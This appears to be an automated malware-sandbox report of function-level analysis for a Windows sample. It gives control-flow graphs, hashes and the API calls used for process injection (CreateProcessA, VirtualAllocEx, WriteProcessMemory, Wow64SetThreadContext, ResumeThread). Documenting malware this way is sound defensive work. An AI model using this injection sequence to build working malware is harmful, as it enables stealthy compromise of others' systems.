                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 304c668c1d73a62a365959ba40959a1021f2210b50f58f11da91c0f49bed2666
                                            • Instruction ID: 9c821917790890c0b156d55b7c111c264e222b0bc6c2385a789d1517462fdcaf
                                            • Opcode Fuzzy Hash: 304c668c1d73a62a365959ba40959a1021f2210b50f58f11da91c0f49bed2666
                                            • Instruction Fuzzy Hash: 7E5157B19007098FEB15DFAAD588BAEBBF5EF48304F208499D419A7360D738AD44CF65
                                            Function 051CADB0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 490 51cadb0-51cae45 492 51cae7e-51cae9e 490->492 493 51cae47-51cae51 490->493 498 51caed7-51caf06 492->498 499 51caea0-51caeaa 492->499 493->492 494 51cae53-51cae55 493->494 496 51cae78-51cae7b 494->496 497 51cae57-51cae61 494->497 496->492 500 51cae65-51cae74 497->500 501 51cae63 497->501 509 51caf3f-51caff9 CreateProcessA 498->509 510 51caf08-51caf12 498->510 499->498 502 51caeac-51caeae 499->502 500->500 503 51cae76 500->503 501->500 504 51caeb0-51caeba 502->504 505 51caed1-51caed4 502->505 503->496 507 51caebc 504->507 508 51caebe-51caecd 504->508 505->498 507->508 508->508 511 51caecf 508->511 521 51caffb-51cb001 509->521 522 51cb002-51cb088 509->522 510->509 512 51caf14-51caf16 510->512 511->505 514 51caf18-51caf22 512->514 515 51caf39-51caf3c 512->515 516 51caf24 514->516 517 51caf26-51caf35 514->517 515->509 516->517 517->517 518 51caf37 517->518 518->515 521->522 532 51cb098-51cb09c 522->532 533 51cb08a-51cb08e 522->533 534 51cb0ac-51cb0b0 532->534 535 51cb09e-51cb0a2 532->535 533->532 536 51cb090 533->536 538 51cb0c0-51cb0c4 534->538 539 51cb0b2-51cb0b6 534->539 535->534 537 51cb0a4 535->537 536->532 537->534 541 51cb0d6-51cb0dd 538->541 542 51cb0c6-51cb0cc 538->542 539->538 540 51cb0b8 539->540 540->538 543 51cb0df-51cb0ee 541->543 544 51cb0f4 541->544 542->541 543->544 545 51cb0f5 544->545 545->545
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 051CAFE6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: df9277fa144034d5bd50666a90f2006e71473061b1672f656f7a43edf01fad95
                                            • Instruction ID: f4f3d03331e05110e407d813584bfecbfc00c09234d6280b1fe3b2735977ee0b
                                            • Opcode Fuzzy Hash: df9277fa144034d5bd50666a90f2006e71473061b1672f656f7a43edf01fad95
                                            • Instruction Fuzzy Hash: 8F917C71D04219CFDF21CFA8C845BEDBBB2BF49304F1485A9E819A7280DB759985CF92
                                            Function 051CADA5 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 433 51cada5-51cae45 435 51cae7e-51cae9e 433->435 436 51cae47-51cae51 433->436 441 51caed7-51caf06 435->441 442 51caea0-51caeaa 435->442 436->435 437 51cae53-51cae55 436->437 439 51cae78-51cae7b 437->439 440 51cae57-51cae61 437->440 439->435 443 51cae65-51cae74 440->443 444 51cae63 440->444 452 51caf3f-51caff9 CreateProcessA 441->452 453 51caf08-51caf12 441->453 442->441 445 51caeac-51caeae 442->445 443->443 446 51cae76 443->446 444->443 447 51caeb0-51caeba 445->447 448 51caed1-51caed4 445->448 446->439 450 51caebc 447->450 451 51caebe-51caecd 447->451 448->441 450->451 451->451 454 51caecf 451->454 464 51caffb-51cb001 452->464 465 51cb002-51cb088 452->465 453->452 455 51caf14-51caf16 453->455 454->448 457 51caf18-51caf22 455->457 458 51caf39-51caf3c 455->458 459 51caf24 457->459 460 51caf26-51caf35 457->460 458->452 459->460 460->460 461 51caf37 460->461 461->458 464->465 475 51cb098-51cb09c 465->475 476 51cb08a-51cb08e 465->476 477 51cb0ac-51cb0b0 475->477 478 51cb09e-51cb0a2 475->478 476->475 479 51cb090 476->479 481 51cb0c0-51cb0c4 477->481 482 51cb0b2-51cb0b6 477->482 478->477 480 51cb0a4 478->480 479->475 480->477 484 51cb0d6-51cb0dd 481->484 485 51cb0c6-51cb0cc 481->485 482->481 483 51cb0b8 482->483 483->481 486 51cb0df-51cb0ee 484->486 487 51cb0f4 484->487 485->484 486->487 488 51cb0f5 487->488 488->488
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 051CAFE6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: ad533435474381e88c3887fd6e5f484bd599fdedfef27e4db7bd824aadca0454
                                            • Instruction ID: 9c948dbdec45f26ad22579d38c82d1e076a12a37a496c0c95dfce4966085b026
                                            • Opcode Fuzzy Hash: ad533435474381e88c3887fd6e5f484bd599fdedfef27e4db7bd824aadca0454
                                            • Instruction Fuzzy Hash: BF918B71D04219CFDF21CFA8C845BEDBBB2BF49304F1485A9E819A7280DB759985CF92
                                            Function 04B3ADC8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 547 4b3adc8-4b3add7 548 4b3ae03-4b3ae07 547->548 549 4b3add9-4b3ade6 call 4b3a0ec 547->549 551 4b3ae1b-4b3ae5c 548->551 552 4b3ae09-4b3ae13 548->552 556 4b3ade8 549->556 557 4b3adfc 549->557 558 4b3ae69-4b3ae77 551->558 559 4b3ae5e-4b3ae66 551->559 552->551 604 4b3adee call 4b3b051 556->604 605 4b3adee call 4b3b060 556->605 557->548 560 4b3ae9b-4b3ae9d 558->560 561 4b3ae79-4b3ae7e 558->561 559->558 565 4b3aea0-4b3aea7 560->565 563 4b3ae80-4b3ae87 call 4b3a0f8 561->563 564 4b3ae89 561->564 562 4b3adf4-4b3adf6 562->557 566 4b3af38-4b3af4f 562->566 568 4b3ae8b-4b3ae99 563->568 564->568 569 4b3aeb4-4b3aebb 565->569 570 4b3aea9-4b3aeb1 565->570 580 4b3af51-4b3afb0 566->580 568->565 571 4b3aec8-4b3aeca call 4b3a108 569->571 572 4b3aebd-4b3aec5 569->572 570->569 576 4b3aecf-4b3aed1 571->576 572->571 578 4b3aed3-4b3aedb 576->578 579 4b3aede-4b3aee3 576->579 578->579 581 4b3af01-4b3af0e 579->581 582 4b3aee5-4b3aeec 579->582 598 4b3afb2-4b3aff8 580->598 589 4b3af31-4b3af37 581->589 590 4b3af10-4b3af2e 581->590 582->581 584 4b3aeee-4b3aefe call 4b3a118 call 4b3a128 582->584 584->581 590->589 599 4b3b000-4b3b02b GetModuleHandleW 598->599 600 4b3affa-4b3affd 598->600 601 4b3b034-4b3b048 599->601 602 4b3b02d-4b3b033 599->602 600->599 602->601 604->562 605->562
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 04B3B01E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: be5390ce4c92963dc781659f53d7f28c2ca6583225b96c2a363413e7079d6768
                                            • Instruction ID: c2e4526df41bd32b3d83d5ce456ac9a0728cc249942a313dcb7a1d6d09ba2944
                                            • Opcode Fuzzy Hash: be5390ce4c92963dc781659f53d7f28c2ca6583225b96c2a363413e7079d6768
                                            • Instruction Fuzzy Hash: 50711070A00B058FDB24DF2AD05475ABBF2FF88705F208A6AD48A97A50DB75F945CB90
                                            Function 04B344C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 714 4b344c4-4b359d9 CreateActCtxA 717 4b359e2-4b35a3c 714->717 718 4b359db-4b359e1 714->718 725 4b35a4b-4b35a4f 717->725 726 4b35a3e-4b35a41 717->726 718->717 727 4b35a51-4b35a5d 725->727 728 4b35a60 725->728 726->725 727->728 729 4b35a61 728->729 729->729
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 04B359C9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: e0bcf81dd31ab7c8fc8028094a90c28a9cd8e2ec0d90fab01d06a1d1ec4083f6
                                            • Instruction ID: 18d29b6fdff63c11d3a78b9f0950cf2f788812c5f29441f39660ca1f4ee89598
                                            • Opcode Fuzzy Hash: e0bcf81dd31ab7c8fc8028094a90c28a9cd8e2ec0d90fab01d06a1d1ec4083f6
                                            • Instruction Fuzzy Hash: 4841F2B1C0071DDBDB24CFAAC884B9DBBB5FF48304F2080AAD408AB255DB756946CF91
                                            Function 04B3590D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 731 4b3590d-4b359d9 CreateActCtxA 733 4b359e2-4b35a3c 731->733 734 4b359db-4b359e1 731->734 741 4b35a4b-4b35a4f 733->741 742 4b35a3e-4b35a41 733->742 734->733 743 4b35a51-4b35a5d 741->743 744 4b35a60 741->744 742->741 743->744 745 4b35a61 744->745 745->745
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 04B359C9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 9394fb8c3892dfafe3b35ad11f0199bb0c3ff99b3439fa29457e432c5b9f94b8
                                            • Instruction ID: 86480e9fa608d7f102246638afdef2a3f44b322396ee53e703d09293d4cad2a6
                                            • Opcode Fuzzy Hash: 9394fb8c3892dfafe3b35ad11f0199bb0c3ff99b3439fa29457e432c5b9f94b8
                                            • Instruction Fuzzy Hash: 5F41E5B1C00619DBDB24CFA9C984B8DBBF2FF48304F20806AD418AB255D7756946CF51
                                            Function 051CAB20 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 747 51cab20-51cab76 749 51cab78-51cab84 747->749 750 51cab86-51cabc5 WriteProcessMemory 747->750 749->750 752 51cabce-51cabfe 750->752 753 51cabc7-51cabcd 750->753 753->752
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 051CABB8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 667d74a5758eba572458df42f85a4429917596abf27114a01786a73037dec18c
                                            • Instruction ID: cd664ab115da756af88fd407c229bd94c720e0ef01b6ac49932b7169f8bb3345
                                            • Opcode Fuzzy Hash: 667d74a5758eba572458df42f85a4429917596abf27114a01786a73037dec18c
                                            • Instruction Fuzzy Hash: A52155B5900309CFDB10DFA9C985BEEBBF1FF48310F10842AE919A7250C7789940CBA0
                                            Function 051CAB28 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 757 51cab28-51cab76 759 51cab78-51cab84 757->759 760 51cab86-51cabc5 WriteProcessMemory 757->760 759->760 762 51cabce-51cabfe 760->762 763 51cabc7-51cabcd 760->763 763->762
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 051CABB8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 9d74bdb0186b6be394a51c6ef95bb325e72ed6f085a67f2222e84d329713f1ff
                                            • Instruction ID: 1b556b2eb8800f16f89639ce57fdc16fb0a73059a086c6efcf6c65fc24449b61
                                            • Opcode Fuzzy Hash: 9d74bdb0186b6be394a51c6ef95bb325e72ed6f085a67f2222e84d329713f1ff
                                            • Instruction Fuzzy Hash: B42125B190034D9FCB10DFAAC985BEEBBF5FF48310F10842AE919A7250C7799944CBA0
                                            Function 051CAC18 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 051CAC98
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 872cc6163c51c0fd54138d5c54d1d2207611acb1148aabeb2d1bfed977e28e54
                                            • Instruction ID: b975a20ce69f6029e5d682e326abff7792988c7654acd68597e6395f16cf94d4
                                            • Opcode Fuzzy Hash: 872cc6163c51c0fd54138d5c54d1d2207611acb1148aabeb2d1bfed977e28e54
                                            • Instruction Fuzzy Hash: 302125B18003499FCB10DFAAC985AEEFBF5FF48310F10882AE519A7250C7399941CBA4
                                            Function 051CAC11 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 051CAC98
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: bf698100ea03436dcc316ca36ca54327f8eac017e02b6a487ff4dd71f915673e
                                            • Instruction ID: dd3c05e60e69f11ac513c383db43814862188efb82142534027d5f663a9fe3f2
                                            • Opcode Fuzzy Hash: bf698100ea03436dcc316ca36ca54327f8eac017e02b6a487ff4dd71f915673e
                                            • Instruction Fuzzy Hash: 632125B1C003499FCB10DFAAC985AEEFBF5FF48310F14882AE559A7250C7389941CBA4
                                            Function 051CA990 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 051CAA0E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 5ab5be3a5500a531a907cd946a89dd8c8d98b30ddde8e9b36e5b6b6f8b4d8e4b
                                            • Instruction ID: 2ffca6f59bf360033cbf5d49df0c8f1f7e0f47280764814f418f25b8ad65dbd3
                                            • Opcode Fuzzy Hash: 5ab5be3a5500a531a907cd946a89dd8c8d98b30ddde8e9b36e5b6b6f8b4d8e4b
                                            • Instruction Fuzzy Hash: 172134B19002098FDB10DFAAC585BEEBBF4EF88314F10842AD559A7240CB78A945CBA0
                                            Function 051CA988 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 772 51ca988-51ca9db 774 51ca9dd-51ca9e9 772->774 775 51ca9eb-51caa1b Wow64SetThreadContext 772->775 774->775 777 51caa1d-51caa23 775->777 778 51caa24-51caa54 775->778 777->778
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 051CAA0E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 56ac67aa9a8eeff2d64fe6fbc652c44bec2f4ea5fb7f80a3e2a6c741c42b973d
                                            • Instruction ID: 2b3cb9fb01d0f65f6373ec100d037071a4e92715d6799ba7793809f67214a582
                                            • Opcode Fuzzy Hash: 56ac67aa9a8eeff2d64fe6fbc652c44bec2f4ea5fb7f80a3e2a6c741c42b973d
                                            • Instruction Fuzzy Hash: 4A2134B59003098FDB10DFAAC5857EEBBF4FF58314F10842AD559A7240CB789985CFA4
                                            Function 04B3D6A8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 767 4b3d6a8-4b3d744 DuplicateHandle 768 4b3d746-4b3d74c 767->768 769 4b3d74d-4b3d76a 767->769 768->769
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04B3D737
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: baaadb4bbd1993b8bab8c6dfeaf8180194ce913810f03649516d6f90451b1ddf
                                            • Instruction ID: b1923472962a3ffe2a1a41981c78181eb05056065a24c6ce78e98e36058bf87e
                                            • Opcode Fuzzy Hash: baaadb4bbd1993b8bab8c6dfeaf8180194ce913810f03649516d6f90451b1ddf
                                            • Instruction Fuzzy Hash: D221E0B5900258DFDB10CFAAD584ADEBBF9EB48320F14805AE918B7350C378A944CFA4
                                            Function 04B3D6B0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04B3D737
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 74e7cee0ad5302c35fd1f8edfa4f864969ce0d5dc473069dd8d5b7ccf3942bee
                                            • Instruction ID: 396e2c351a60bb8f4b078907bcb5248c63bdd9914890b0d50d6e3990207e79b7
                                            • Opcode Fuzzy Hash: 74e7cee0ad5302c35fd1f8edfa4f864969ce0d5dc473069dd8d5b7ccf3942bee
                                            • Instruction Fuzzy Hash: 6A21C2B5900248DFDB10CFAAD984ADEFBF9FB48310F14845AE958A3350D378A944CFA5
                                            Function 04B3A150 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04B3B099,00000800,00000000,00000000), ref: 04B3B2AA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: e2b687342a9d8673b6dc9c91054ac668955ddd5a46b14cf29eb96e916e9d43c0
                                            • Instruction ID: 16fe578e9e2e163a6921043a4a54709cf0809d14d7c0d6c75d877f06961d7c3d
                                            • Opcode Fuzzy Hash: e2b687342a9d8673b6dc9c91054ac668955ddd5a46b14cf29eb96e916e9d43c0
                                            • Instruction Fuzzy Hash: 251126B69043499FDB20CF9AC848ADEFBF5EB88310F10856ED519A7210C379B945CFA5
                                            Function 051CAA60 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 051CAAD6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: e4d9fb17848bc2d1c66999a982b89ff5abd844c809c9c158b760c836288aa8b7
                                            • Instruction ID: a329d26803d1d4bc34956187eeb41498c23e9c45492a745b4274e466bdc9e2cd
                                            • Opcode Fuzzy Hash: e4d9fb17848bc2d1c66999a982b89ff5abd844c809c9c158b760c836288aa8b7
                                            • Instruction Fuzzy Hash: 1E1114B58002499FDB10DFA9C9456EEBFF5FF88320F20841AE519A7650C7399950DBA0
                                            Function 04B3B239 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04B3B099,00000800,00000000,00000000), ref: 04B3B2AA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4b30000_HHhHh.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 038d28e7436c0956dfdf057e0f71eb525d7fa4d64185dabc3d139c08ce5925b9
                                            • Instruction ID: d3249503894b1f92a8b348b09219b82cf465a9a219bb8a819cde5f2a1413554d
                                            • Opcode Fuzzy Hash: 038d28e7436c0956dfdf057e0f71eb525d7fa4d64185dabc3d139c08ce5925b9
                                            • Instruction Fuzzy Hash: 851123B6C003098FDB20CF9AC844ADEFBF4EB88310F10852AD519A7250C379A945CFA5
                                            Function 051CAA68 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 051CAAD6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: c691da416b421b0c0d44816d807368370ade143fdb67766a967cfb369b06a039
                                            • Instruction ID: c47eb7da03fb026def01a50a9586c547f8d26c449b76b0b82d0abae379afbae8
                                            • Opcode Fuzzy Hash: c691da416b421b0c0d44816d807368370ade143fdb67766a967cfb369b06a039
                                            • Instruction Fuzzy Hash: C21126718002499FCB10DFAAC945AEEFFF5EF88310F208419E519A7250C779A940CBA1
                                            Function 051CA8E0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 6f11c795006b791970776604ff66f29de8c0772128fb207afd143cf1480aafb7
                                            • Instruction ID: f109a69b8257b6dd080dd4beb490ee6766ae827fe74ee0699d5662cdfaeaea7d
                                            • Opcode Fuzzy Hash: 6f11c795006b791970776604ff66f29de8c0772128fb207afd143cf1480aafb7
                                            • Instruction Fuzzy Hash: B21125B19002498FCB20DFAAC4497AEFBF5EF88324F208419D559A7250CB79A944CBA4
                                            Function 051CA8DB Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: da9e3c9ef9b9343c215cff3978c19840a75094f7df14779231adc773b8ae0592
                                            • Instruction ID: b7b75f3faea9405b45b7e9a0651849f6d65b00e688cf202d688d007fe55171a2
                                            • Opcode Fuzzy Hash: da9e3c9ef9b9343c215cff3978c19840a75094f7df14779231adc773b8ae0592
                                            • Instruction Fuzzy Hash: 57116AB1D002488FCB20DFA9C5497EEFFF5EF88314F24845AC159A7250C7399545CBA4
                                            Function 051C8EF0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 051CD14D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: ad67ce5ec1bcb48e325c84dcb25a5fd229b4939f989237fa36ede433279dc02f
                                            • Instruction ID: 5f0e95c7e5114d46832d7eaeed9311b88f1e4cffd572bcd7bdfe0fd4df73976f
                                            • Opcode Fuzzy Hash: ad67ce5ec1bcb48e325c84dcb25a5fd229b4939f989237fa36ede433279dc02f
                                            • Instruction Fuzzy Hash: B011F2B58003499FDB20DF9AD889BDEFFF8EB58310F208459E518A7250C379A944CFA5
                                            Function 051CEBC0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 051CEC18
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2153143101.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_51c0000_HHhHh.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            • Opcode ID: aff431364827a168ce7efb917ce3e0c9ed960bb6d596c2fa2bfdbaee48cd2497
                                            • Instruction ID: 129b4b4603dbf529dcc79084dfe2c3baf8ca394536efd7c212bee5c187c9d9ed
                                            • Opcode Fuzzy Hash: aff431364827a168ce7efb917ce3e0c9ed960bb6d596c2fa2bfdbaee48cd2497
                                            • Instruction Fuzzy Hash: E21106B58003498FCB10DF9AC545BDEFBF4EB48320F108459D558A7250D739A544CFA5
                                            Function 04B3AFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 04B3B01E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2151370319.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
